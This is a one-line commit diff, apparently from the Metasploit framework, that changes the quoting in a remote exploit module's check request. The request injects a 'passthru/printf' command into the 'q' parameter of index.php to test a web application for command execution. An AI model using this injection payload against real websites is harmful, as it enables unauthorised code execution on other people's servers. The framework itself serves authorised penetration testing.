Switch to single quotes

Might as well, since we're avoiding escaping.
This commit is contained in:
William Vu 2016-07-21 00:09:19 -05:00
parent 2e631cab5b
commit 32f1c83c9e
1 changed files with 1 additions and 1 deletions

View File

@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'q' => "taxonomy_vocabulary//passthru/printf \"#{Rex::Text.to_octal(r)}\""
'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
}
)
if res && res.body.include?(r)